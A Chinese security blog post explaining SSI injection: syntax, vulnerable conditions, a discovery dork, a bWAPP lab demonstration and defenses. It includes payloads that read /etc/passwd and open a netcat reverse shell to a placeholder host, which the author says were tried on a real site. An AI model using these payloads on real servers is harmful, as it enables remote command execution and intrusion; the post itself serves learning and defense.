SSI-服务器端包含注入

发表于 |
字数统计 1,210 | 阅读时长 5

前段时间刚好在一篇文章中看到了一个SSI的文章,现在这种业务基本上很少见了,之前也没了解过(原谅我是菜鸡—_-!)没留意过。运气好,刚好在微博上给遇到了,所以记录下学习过程。

0x01 关于SSI

SSI是英文”Server Side Includes”的缩写,翻译成中文就是服务器端包含的意思。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。

从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。

1.1 启用SSI

示例:Nginx 配置SSI功能

在http段中加入下面几句即可:

1
2
3
ssi on;
ssi_silent_errors off;
ssi_types text/shtml;

默认Apache不开启SSI,SSI这种技术已经比较少用了。如果应用没有使用到SSI,关闭服务器对SSI的支持即可。

IIS和Apache都可以开启SSI功能,具体可参考:http://m.jb51.net/article/25725.htm

1.2 SSI语法

首先,介绍下SHTML,在SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。比如说框架是固定的,但是里面的文章,其他菜单等即可以用#include引用进来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
1、显示服务器端环境变量<#echo>
本文档名称:
<!–#echo var="DOCUMENT_NAME"–>
现在时间:
<!–#echo var="DATE_LOCAL"–>
显示IP地址</ins>
<! #echo var="REMOTE_ADDR"–>
2、将文本内容直接插入到文档中<#include>
<! #include file="文件名称"–>
<!--#include virtual="index.html" -->
<! #include virtual="文件名称"–>
<!--#include virtual="/www/footer.html" -->
注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径
3、显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等)
文件最近更新日期:
<! #flastmod file="文件名称"–>
文件的长度:
<!–#fsize file="文件名称"–>
4、直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)
<!–#exec cmd="文件名称"–>
<!--#exec cmd="cat /etc/passwd"-->
<!–#exec cgi="文件名称"–>
<!--#exec cgi="/cgi-bin/access_log.cgi
将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。
5、设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)
6、高级SSI可设置变量使用if条件语句。

更多请参考:http://www.javaeye.com/topic/306216

0x02 漏洞场景

在很多业务中,用户输入的内容会显示在页面中。比如,一个存在反射型XSS漏洞的页面,如果输入的payload不是XSS代码而是SSI的标签,同时服务器又开启了对SSI的支持的话就会存在SSI漏洞。

从定义中看出,页面中有一小部分是动态输出的时候使用SSI,
比如:

1
2
3
4
文件相关的属性字段
当前时间
访客IP
调用CGI程序

0x03 SSI注入的条件

当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令:

  • Web 服务器已支持SSI(服务器端包含)
  • Web 应用程序未对对相关SSI关键字做过滤
  • Web 应用程序在返回响应的HTML页面时,嵌入用户输入

SSI注入常用命令:

https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection

0x04 SSI挖掘思路

两个思路:

  • 从业务场景来Fuzz,比如获取IP、定位、时间等
  • 识别页面是否包含.stm,.shtm和.shtml后缀

google dork:inurl:bin/cklb

0x05 SSI漏洞复现

5.1 本地测试

我们使用bWAPP来做漏洞演示环境
选择:Server-Side Includes (SSI) Injection

输入个XSS的payload:<script>alert(1)</script>

成功执行了代码。

再使用下exec指令使用cmd作为参数执行服务器端命令:<!--#exec cmd="ls -al"-->

5.2 漏洞挖掘

运气好,刚好遇到个微博的。

1
"-->'-->`--><<!--#exec cmd="cat /etc/passwd"-->

1
"-->'-->`--><<!--#exec cmd="nc x.x.x.x 9090 -e /bin/bash"-->

0x06 SSI防御

  • 关闭服务器SSI功能
  • 过滤相关SSI特殊字符(<,>,#,-,",'

具体请参考:
SSI 注入的介绍和代码防御

参考:

http://m.jb51.net/article/25725.htm

http://www.kubiji.cn/topic-id998.html

https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection

http://www.mottoin.com/101526.html

http://www.evilclay.com/2017/04/28/SSI-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8C%85%E5%90%AB%E6%B3%A8%E5%85%A5/

http://blog.csdn.net/qq_29277155/article/details/52751364

大爷,赏个铜板呗!